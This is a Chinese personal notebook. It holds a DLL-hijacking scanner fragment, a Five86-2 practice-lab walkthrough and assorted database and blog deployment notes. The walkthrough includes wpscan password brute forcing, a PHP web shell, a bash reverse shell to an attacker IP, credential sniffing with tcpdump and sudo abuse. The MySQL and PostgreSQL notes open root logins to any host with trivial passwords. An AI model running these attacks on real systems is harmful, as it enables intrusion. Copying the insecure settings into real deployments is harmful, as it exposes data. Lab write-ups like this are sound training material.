                    print(fileName)
                    MicrosoftDlls.add(fileName.lower())
                elif fileName[-4:] == '.exe': # EXE
                    GetPayload(path, fileName) # 生成 Payload
    except: # 文件夹无法打开
        pass

if __name__ == '__main__':
    if len(sys.argv) == 2:
        # 收集微软 DLL
        if os.path.exists('微软 DLL.txt'):
            with open('微软 DLL.txt','r') as f:
                MicrosoftDlls = f.read().splitlines() # ['ntdll.dll', 'kernel32.dll', ...]
        else:
            MicrosoftDlls = set() # {'ntdll.dll', 'kernel32.dll', ...}
            Scan('C:/Windows/System32', '.dll')
            Scan('C:/Windows/SysWOW64', '.dll')
            Scan('C:/Windows/WinSxS', '.dll')
            with open('微软 DLL.txt', 'w') as f:
                f.write('\n'.join(MicrosoftDlls))
        # 扫描 EXE
        Scan(sys.argv[1], '.exe') ## 对指导路径下的文件进行扫描，看是否符合dll 劫持条件
    else:
        print('Usage: python SkyShadow.py "D:/"')

然后生成替换放到同一目录即可

---

概述

• 使用nmap进行端口枚举
• 使用wpscan枚举用户名
• 使用wpscan爆破wordpress的密码
• Linux tcpdump Capabilities能力的使用
• tcpdump 查看数据包发现其他用户的凭据信息
• service 的sudo权限
• passwd 的sudo权限

---

利用过程

添加five86-2 到/etc/hosts中

┌──(root㉿kali)-[~]
└─# cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali.localdomain        kali
192.168.243.28  five86-2

Nmap

┌──(root㉿kali)-[~/Desktop]
└─# nmap -p- 192.168.206.28
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-23 10:57 CST
Stats: 0:06:29 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 42.65% done; ETC: 11:12 (0:08:43 remaining)
Nmap scan report for five86-2 (192.168.206.28)
Host is up (0.31s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT   STATE  SERVICE
20/tcp closed ftp-data
21/tcp open   ftp
80/tcp open   http

Nmap done: 1 IP address (1 host up) scanned in 868.31 seconds

┌──(root㉿kali)-[~/Desktop]
└─# nmap -sC -sV -p21,80 192.168.206.28                                                                      
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-23 10:19 CST
Nmap scan report for localhost (192.168.206.28)
Host is up (0.35s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5e
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: WordPress 5.1.4
|_http-title: Five86-2 – Just another WordPress site
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.26 seconds

dirsearch

wpscan

使用wpscan枚举用户名

┌──(root㉿kali)-[~]
└─# wpscan --url http://five86-2/ -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://five86-2/ [192.168.206.28]
[+] Started: Wed Aug 23 17:02:04 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://five86-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://five86-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://five86-2/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://five86-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.1.4 identified (Insecure, released on 2019-12-12).
 | Found By: Rss Generator (Passive Detection)
 |  - http://five86-2/index.php/feed/, <generator>https://wordpress.org/?v=5.1.4</generator>
 |  - http://five86-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.1.4</generator>

[+] WordPress theme in use: twentynineteen
 | Location: http://five86-2/wp-content/themes/twentynineteen/
 | Last Updated: 2023-03-29T00:00:00.000Z
 | Readme: http://five86-2/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 2.5
 | Style URL: http://five86-2/wp-content/themes/twentynineteen/style.css?ver=1.3
 | Style Name: Twenty Nineteen
 | Style URI: https://github.com/WordPress/twentynineteen
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://five86-2/wp-content/themes/twentynineteen/style.css?ver=1.3, Match: 'Version: 1.3'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:03 <====================================================================================================================================> (10 / 10) 100.00% Time: 00:00:03

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://five86-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] barney
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] gillian
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] peter
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] stephen
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Aug 23 17:02:27 2023
[+] Requests Done: 61
[+] Cached Requests: 6
[+] Data Sent: 15.755 KB
[+] Data Received: 550.247 KB
[+] Memory used: 216.422 MB
[+] Elapsed time: 00:00:22

┌──(root㉿kali)-[~]
└─# 

wpscan 枚举插件

┌──(root㉿kali)-[~]
└─# wpscan --url http://five86-2/ -e p
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]Y
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://five86-2/ [192.168.206.28]
[+] Started: Wed Aug 23 20:15:45 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://five86-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://five86-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://five86-2/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://five86-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.1.4 identified (Insecure, released on 2019-12-12).
 | Found By: Rss Generator (Passive Detection)
 |  - http://five86-2/index.php/feed/, <generator>https://wordpress.org/?v=5.1.4</generator>
 |  - http://five86-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.1.4</generator>

[+] WordPress theme in use: twentynineteen
 | Location: http://five86-2/wp-content/themes/twentynineteen/
 | Last Updated: 2023-03-29T00:00:00.000Z
 | Readme: http://five86-2/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 2.5
 | Style URL: http://five86-2/wp-content/themes/twentynineteen/style.css?ver=1.3
 | Style Name: Twenty Nineteen
 | Style URI: https://github.com/WordPress/twentynineteen
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://five86-2/wp-content/themes/twentynineteen/style.css?ver=1.3, Match: 'Version: 1.3'

[+] Enumerating Most Popular Plugins (via Passive Methods)

[i] No plugins Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Aug 23 20:16:00 2023
[+] Requests Done: 42
[+] Cached Requests: 5
[+] Data Sent: 9.892 KB
[+] Data Received: 20.443 MB
[+] Memory used: 262.859 MB
[+] Elapsed time: 00:00:14

使用wpscan对登录密码进行暴力破解

wpscan  --url http://192.168.214.28/ -U user.txt -P pass.txt  

┌──(root㉿Attack)-[~/Desktop/offsec/pg/five86.2]
└─# cat user.txt                                             
peter
admin
barney
gillian
stephen

得到账号密码

[SUCCESS] - barney / spooky1
[SUCCESS] - stephen / apollo1 

getshell

访问http://five86-2/wp-content/uploads/ 目录发现存在articulate_uploads目录

在exploit-db上搜索articulate 发现存在RCE

https://www.exploit-db.com/exploits/46981

根据POC来写shell

┌──(root㉿Attack)-[~/Desktop/offsec/pg/five86.2]
└─# echo "<html>hello</html>" > index.html

┌──(root㉿Attack)-[~/Desktop/offsec/pg/five86.2]
└─# vim index.php  
┌──(root㉿Attack)-[~/Desktop/offsec/pg/five86.2]
└─# cat index.php 
<?php echo system($_GET['cmd']); ?>

┌──(root㉿Attack)-[~/Desktop/offsec/pg/five86.2]
└─# zip pwn.zip index.html shell.php
        zip warning: name not matched: shell.php
  adding: index.html (deflated 11%)

其他的跟着POC来即可

访问以下url来获取shell

http://five86-2/wp-content/uploads/articulate_uploads/poc/index.php?cmd=whoami

反弹shell 需要url编码
bash -c 'bash -i >& /dev/tcp/192.168.45.184/443 0>&1'

特权提升

使用stephen的凭据信息成功登录

在/home/stephen/目录下发现local.txt

在id中发现可疑的pacp

查看接口

枚举Linux能力

stephen@five86-2:~$ getcap -r / 2>/dev/null
getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip
stephen@five86-2:~$ 

发现tcpdump在低权限也可以使用

转储TCP数据包

stephen@five86-2:~$ tcpdump -D
tcpdump -D
1.br-eca3858d86bf [Up, Running]
2.eth0 [Up, Running]
3.veth5c7780b [Up, Running]
4.lo [Up, Running, Loopback]
5.any (Pseudo-device that captures on all interfaces) [Up, Running]
6.docker0 [Up]
7.nflog (Linux netfilter log (NFLOG) interface) [none]
8.nfqueue (Linux netfilter queue (NFQUEUE) interface) [none]
stephen@five86-2:~$ 

检查veth5c7780b 的流量并保存到数据包中

stephen@five86-2:~$ timeout 150 tcpdump -w cap.pcap -i veth298a95b
timeout 150 tcpdump -w cap.pcap -i veth298a95b
tcpdump: veth298a95b: No such device exists
(SIOCGIFHWADDR: No such device)
stephen@five86-2:~$ timeout 150 tcpdump -w cap.pcap -i veth5c7780b 
timeout 150 tcpdump -w cap.pcap -i veth5c7780b 
tcpdump: listening on veth5c7780b, link-type EN10MB (Ethernet), capture size 262144 bytes

56 packets captured
56 packets received by filter
0 packets dropped by kernel
stephen@five86-2:~$ 
stephen@five86-2:~$ ls -la
ls -la
total 24
drwx------  3 stephen stephen 4096 Aug 25 03:01 .
drwxr-xr-x 10 root    root    4096 Jan  9  2020 ..
lrwxrwxrwx  1 stephen stephen    9 Jan 13  2020 .bash_history -> /dev/null
-rw-rw-r--  1 stephen stephen 4903 Aug 25 03:04 cap.pcap
drwx------  3 stephen stephen 4096 Aug 25 02:44 .gnupg
-rw-r--r--  1 stephen stephen   33 Aug 25 01:52 local.txt

查看数据包，发现账号密码

tcpdump -r cap.pcap

USER paul
PASS esomepasswford

切换用户，查看sudo权限

我们发现该用户具有以用户身份运行 /usr/sbin/service 程序的 sudo 权限。滥用此设置，我们现在可以切换到peter用户

sudo -u peter /usr/sbin/service ../../bin/bash

发现该用户具有passwd 的sudo权限

---

FTK 设置中文

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\SOFTWARE\AccessData]
"Preferred Language"="CHS"

Mysql

mysql 5.7 修改用户远程登录

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;

FLUSH PRIVILEGES;

Mysql 5.7 修改密码

SET PASSWORD FOR 'root'@'%' = PASSWORD('123456');

FLUSH PRIVILEGES;

Mysql 跳过登录

修改my.cnf

[mysqld]
skip-grant-tables

PostgreSQL

修改PSQL密码

su postgres
psql
ALTER USER postgres WITH PASSWORD 'postgres';

修改 PSQL 可以远程登录

vim /etc/postgresql/10/main/postgresql.conf     #修改配置文件

#将 listen_addresses 设置为 '*'
listen_addresses = '*'          # what IP address(es) to listen on;

#列出所有数据库
postgres-# \l
                                   List of databases
    Name    |   Owner    | Encoding |   Collate   |    Ctype    |   Access privileges   
------------+------------+----------+-------------+-------------+-----------------------
 breeze2020 | vericant   | UTF8     | en_US.UTF-8 | en_US.UTF-8 | 
 moodle     | moodleuser | UTF8     | cs_CZ.utf8  | cs_CZ.utf8  | 
 postgres   | postgres   | UTF8     | en_US.UTF-8 | en_US.UTF-8 | 
 template0  | postgres   | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
            |            |          |             |             | postgres=CTc/postgres
 template1  | postgres   | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
            |            |          |             |             | postgres=CTc/postgres
 vagora     | vericant   | UTF8     | en_US.UTF-8 | en_US.UTF-8 | 
(6 rows)

#修改配置文件为远程访问
vim /etc/postgresql/10/main/pg_hba.conf 

# TYPE  DATABASE        USER            ADDRESS                 METHOD
host    all             all             0.0.0.0/0               md5

挂载磁盘

[root@VM_4_5_centos data]# lsblk
NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
sda      8:0    0  110G  0 disk 
└─sda1   8:1    0  110G  0 part /
sdb      8:16   0  200G  0 disk 
└─sdb1   8:17   0  100G  0 part 
[root@VM_4_5_centos data]# 
[root@VM_4_5_centos data]# sudo mount /dev/sdb1 /data

gitlab

列出所有用户

User.all.each do |user|
  puts "Username: #{user.username}, Email: #{user.email}"
end

列出所有管理员用户

# 列出所有管理员用户
User.admins.each do |admin|
  puts "Username: #{admin.username}, Email: #{admin.email}"
end

修改指定用户的密码

# 查找用户
user = User.find_by(username: 'zjh')

# 修改密码
user.password = 'DHCPtest123'
user.password_confirmation = 'DHCPtest123'
user.save!

# 退出Rails控制台
exit

Sql Server

当数据库sql文件导入内存报错

SQLServer执行大脚本文件时，提示“无法执行脚本没有足够的内存继续执行程序 (mscorlib)

那就是用sqlcmd进行导入处理

cd C:\Program Files\Microsoft SQL Server\140\Tools\Binn

#这个目录中的140可能会不一样。根据实际情况来

--- 
sqlcmd -S DESKTOP-test\TEST -U sa -P test -d test -i C:\Users\Public\数据库\test.sql


-S 数据连接信息，这里使用的是主机名进行连接
-U 用户名
-P 密码
-d 导入的数据库
-i 数据库来源

sqlserver 导入大文件出错

• sqlserver 数据库导出导入的一种方式_sql server导出数据-CSDN博客

---

Blog 前后端部署

后端 Mx-Space 前端主题为Shiro

后端 Mx-Space 部署

官方部署文档->推荐使用Docker部署 Docker 部署 | Mix Space (mx-space.js.org)

cd && mkdir -p mx-space/core && cd $_
 
# 拉取 docker-compose.yml 文件
wget https://fastly.jsdelivr.net/gh/mx-space/core@master/docker-compose.yml

然后配置这些内容修改docker-compose.yml文件

示例内容
- JWT_SECRET=testtesttesttest 
- ALLOWED_ORIGINS=mxapi.test.cpm 
- ENCRYPT_ENABLE=false 
- ENCRYPT_KEY=

然后使用 docker-compose up -d 启动容器

后端反向代理部署

需要先安装宝塔面板，然后创建一个反向代理先

确认添加后访问 /www/server/panel/vhost/nginx 在文件路径中找到你的配置域名的conf文件编辑 复制下面的配置文件然后根据自己的需要将api.test.domain全部替换你自己的域名

server
{
    listen 80;
    listen 443 ssl http2;
    server_name api.test.domain;
    index index.php index.html index.htm default.php default.htm default.html;
    root /www/wwwroot/api.test.domain;


    #SSL-START SSL相关配置，请勿删除或修改下一行带注释的404规则
    #error_page 404/404.html;
    #HTTP_TO_HTTPS_START
    if ($server_port !~ 443){
        rewrite ^(/.*)$ https://$host$1 permanent;
    }
    #HTTP_TO_HTTPS_END
    ssl_certificate    /www/server/panel/vhost/cert/api.test.domain/fullchain.pem;
    ssl_certificate_key    /www/server/panel/vhost/cert/api.test.domain/privkey.pem;
    ssl_protocols TLSv1.1 TLSv1.2 TLSv1.3;
    ssl_ciphers EECDH+CHACHA20:EECDH+CHACHA20-draft:EECDH+AES128:RSA+AES128:EECDH+AES256:RSA+AES256:EECDH+3DES:RSA+3DES:!MD5;
    ssl_prefer_server_ciphers on;
    ssl_session_cache shared:SSL:10m;
    ssl_session_timeout 10m;
    add_header Strict-Transport-Security "max-age=31536000";
    error_page 497  https://$host$request_uri;


    #SSL-END

    #ERROR-PAGE-START  错误页配置，可以注释、删除或修改
    #error_page 404 /404.html;
    #error_page 502 /502.html;
    #ERROR-PAGE-END

    #PHP-INFO-START  PHP引用配置，可以注释或修改
    #清理缓存规则


    location ~ /purge(/.*) {
        proxy_cache_purge cache_one $host$1$is_args$args;
        #access_log  /www/wwwlogs/api.arthals.ink_purge_cache.log;
    }

    #提升申请SSL证书所需目录的匹配规则到反向代理前，可以保证自动续签SSL证书正常运行
    #一键申请SSL证书验证目录相关设置
    location ~ \.well-known{
        root /www/wwwroot/api.test.domain;
        allow all;
    }

    #禁止在证书验证目录放入敏感文件
    if ( $uri ~ "^/\.well-known/.*\.(php|jsp|py|js|css|lua|ts|go|zip|tar\.gz|rar|7z|sql|bak)$" ) {
        return 403;
    }

    #以下为核心配置项，设置反向代理，并设置 Upgrade / Connection 头以启用 WebSocket 链接
    location ~ / {
         proxy_pass http://127.0.0.1:2333;
         proxy_read_timeout 300s;
         proxy_send_timeout 300s;
         #proxy_set_header Host $host;
         proxy_set_header X-Real-IP $remote_addr;
         proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
         proxy_http_version 1.1;
         proxy_set_header Upgrade $http_upgrade;
         proxy_set_header Connection $connection_upgrade;
    }
    #禁止访问的文件或目录
    location ~ ^/(\.user.ini|\.htaccess|\.git|\.svn|\.project|LICENSE|README.md)
    {
        return 404;
    }

    access_log  /www/wwwlogs/api.test.domain.log;
    error_log  /www/wwwlogs/api.test.domain.error.log;
}

server_name定义的是请求的域名 http://mxapi.chengpi.wiki/proxy/qaqdmin 为后台访问地址

配置前端信息

根据自己的需求修改

{  
    "footer": {  
        "otherInfo": {  
            "date": "2020-{{now}}",  
            "icp": {  
                "text": "萌 ICP 备 20236136 号",  
                "link": "[https://icp.gov.moe/?keyword=20236136](https://icp.gov.moe/?keyword=20236136)"  
            }  
        },  
        "linkSections": [  
            {  
                "name": "关于",  
                "links": [  
                    {  
                        "name": "关于本站",  
                        "href": "/about-site"  
                    },  
                    {  
                        "name": "关于我",  
                        "href": "/about"  
                    },  
                    {  
                        "name": "关于此项目",  
                        "href": "[https://github.com/innei/Shiro](https://github.com/innei/Shiro)",  
                        "external": true  
                    }  
                ]  
            },  
            {  
                "name": "更多",  
                "links": [  
                    {  
                        "name": "时间线",  
                        "href": "/timeline"  
                    },  
                    {  
                        "name": "友链",  
                        "href": "/friends"  
                    },  
                    {  
                        "name": "监控",  
                        "href": "[https://status.innei.in/status/main](https://status.innei.in/status/main)",  
                        "external": true  
                    }  
                ]  
            },  
            {  
                "name": "联系",  
                "links": [  
                    {  
                        "name": "写留言",  
                        "href": "/message"  
                    },  
                    {  
                        "name": "发邮件",  
                        "href": "mailto:i@innei.ren",  
                        "external": true  
                    },  
                    {  
                        "name": "GitHub",  
                        "href": "[https://github.com/innei](https://github.com/innei)",  
                        "external": true  
                    }  
                ]  
            }  
        ]  
    },  
    "config": {  
        "color": {  
            "light": [  
                "#33A6B8",  
                "#FF6666",  
                "#26A69A",  
                "#fb7287",  
                "#69a6cc",  
                "#F11A7B",  
                "#78C1F3",  
                "#FF6666",  
                "#7ACDF6"  
            ],  
            "dark": [  
                "#F596AA",  
                "#A0A7D4",  
                "#ff7b7b",  
                "#99D8CF",  
                "#838BC6",  
                "#FFE5AD",  
                "#9BE8D8",  
                "#A1CCD1",  
                "#EAAEBA"  
            ]  
        },  
        "bg": [  
            "[https://github.com/Innei/static/blob/master/images/F0q8mwwaIAEtird.jpeg?raw=true](https://github.com/Innei/static/blob/master/images/F0q8mwwaIAEtird.jpeg?raw=true)",  
            "[https://github.com/Innei/static/blob/master/images/IMG_2111.jpeg.webp.jpg?raw=true](https://github.com/Innei/static/blob/master/images/IMG_2111.jpeg.webp.jpg?raw=true)"  
        ],  
        "custom": {  
            "css": [  
  
            ],  
            "styles": [  
  
            ],  
            "js": [  
  
            ],  
            "scripts": [  
  
            ]  
        },  
        "site": {  
            "favicon": "/innei.svg",  
            "faviconDark": "/innei-dark.svg"  
        },  
        "hero": {  
            "title": {  
                "template": [  
                    {  
                        "type": "h1",  
                        "text": "Hi, I'm ",  
                        "class": "font-light text-4xl"  
                    },  
                    {  
                        "type": "h1",  
                        "text": "Innei",  
                        "class": "font-medium mx-2 text-4xl"  
                    },  
                    {  
                        "type": "h1",  
                        "text": "👋。",  
                        "class": "font-light text-4xl"  
                    },  
                    {  
                        "type": "br"  
                    },  
                    {  
                        "type": "h1",  
                        "text": "A NodeJS Full Stack ",  
                        "class": "font-light text-4xl"  
                    },  
                    {  
                        "type": "code",  
                        "text": "<Developer />",  
                        "class": "font-medium mx-2 text-3xl rounded p-1 bg-gray-200 dark:bg-gray-800/0 hover:dark:bg-gray-800/100 bg-opacity-0 hover:bg-opacity-100 transition-background duration-200"  
                    },  
                    {  
                        "type": "span",  
                        "class": "inline-block w-[1px] h-8 -bottom-2 relative bg-gray-800/80 dark:bg-gray-200/80 opacity-0 group-hover:opacity-100 transition-opacity duration-200 group-hover:animation-blink"  
                    }  
                ]  
            },  
            "description": "An independent developer coding with love."  
        },  
        "module": {  
            "activity": {  
                "enable": true,  
                "endpoint": "/fn/ps/update"  
            },  
            "donate": {  
                "enable": true,  
                "link": "[https://afdian.net/@Innei](https://afdian.net/@Innei)",  
                "qrcode": [  
                    "[https://cdn.jsdelivr.net/gh/Innei/img-bed@master/20191211132347.png](https://cdn.jsdelivr.net/gh/Innei/img-bed@master/20191211132347.png)",  
                    "[https://cdn.innei.ren/bed/2023/0424213144.png](https://cdn.innei.ren/bed/2023/0424213144.png)"  
                ]  
            },  
            "bilibili": {  
                "liveId": 1434499  
            }  
        }  
    }  
}

前端Shiro主题部署

• 开源github项目 Innei/Shiro: 📜 A minimalist personal website embodying the purity of paper and freshness of snow. (github.com)

apt install git nodejs npm 
npm install -g pnpm pm2

# 进入源码目录编译
cd Shiro
pnpm i && pnpm build

然后修改你的.env文件，每个值都不能为空。token不用的可以为false

前端反向代理

跟后端的反向代理配置相同，修改2333端口改为2323端口即可

持久化运行

在前端代码目录中创建ecosystem.config.js

// ecosystem.config.js
module.exports = {
    apps: [
        {
            name: 'Shiro',
            script: 'npx next start -p 2323',
            instances: 1,
            autorestart: true,
            watch: false,
            max_memory_restart: '180M',
            env: {
                NODE_ENV: 'production',
            },
        },
    ],
};

然后就能够使用

pm2 start 
pm2 list       #列出正在运行的pm2
pm2 restart 0  #0是你的listid

更新

后端

docker pull innei/mx-server:latest

[!warning] 现在的docker 由于墙的原因并不能直接拉取镜像 解决方法，本地能通外网的情况下，拉取镜像后导出镜像，在服务器上导入镜像

前端部署

使用CDN 加速Vercel

• 加速域名和回源host填写你自己的域名

SSL 证书

通配符多域名证书

https://www.joyssl.com/

Picgo + Obsidian + OneDrive

Picgo 环境构建

• Picgo 下载地址 Releases · Molunerfinn/PicGo (github.com)
• Obsidian 官网 Obsidian - Sharpen your thinking

腾讯云环境

首先购买腾讯云对象存储资源包 然后创建存储桶 -> 安全性选择公有读私有写-> 后面的选项根据自己的需求勾选即可

创建Accesskey

头像 -> 访问控制 -> API密钥管理 -> 新建密钥 记录下来填写进入Picgo的

配置文件上传路径为YYYY/MM/DD/

在Picgo 插件设置中搜索 super-prefix

插件配置

YYYY/MM/DD/

YYYYMMDDHHmmss

Obsidian 插件安装

首先需要关闭安全模式

• 设置 -> 第三方插件 -> 关闭安全模式

在插件中搜索 picgo 安装即可

剩下的这么配置

OneDrive 同步指定的文件夹

在Windows 上登录OneDrive 需要使用管理员权限执行

• win 键 -> 搜索 cmd -> 以管理员权限运行

命令模板
mklink /d "本地OneDrive路径\同步到的文件夹名称" "被同步的文件夹路径" 

命令示例
mklink /d "C:\Users\Administrators\OneDrive\Blog" "E:\Blog"

遇到的问题

Obsidian上传问题

Picgo 上传正常但Obsidian上传 Imgur upload failed, check dev console

查看日志发现存在 ENOENT: no such file or directory

访问发现 C:\Users\Administrators\AppData\Roaming\picgo\picgo-clipboard-images 目录不存在

在 C:\Users\Administrators\AppData\Roaming\picgo 目录下创建 picgo-clipboard-images 文件夹即可解决问题

Administrator 为你自己的用户目录

服务器配置较低导致无法编译

2h2g是无法编译的，我编译使用的是4h8g

在腾讯云的服务器选项创建一个相同的系统版本的服务器-竞价实例，编译完就销毁，花不了多少钱

## 快速编译
## 首先肯定是先上传代码

apt update
cd Shiro
apt install nodejs npm -y && npm install -g pnpm pm2 && pnpm i && pnpm build


zip -r Shiro.zip /root/Shiro

## 上传到生产服务器后需要在执行一下。以安装缺失的模块 
pnpm i 

然后上传到你的生产服务器上，解压修改.env文件配置ecosystem.config.js进行持久话运行即可

Picgo 无法安装插件

出现如下错误

2024-07-01 22:23:28 [PicGo ERROR] NPM is not installed 
2024-07-01 22:23:28 [PicGo ERROR] 插件安装失败，失败码为1，错误日志为 

我遇到的原因是软件装在C:\Program Files\PicGo 这个路径需要管理员权限 所以解决方法是退出关闭Picgo软件，然后以管理员权限启动

参考文章

mx-space + Shiro：如纸一般纯净的新博客 - Arthals' ink

制作一个好看的动态签名

---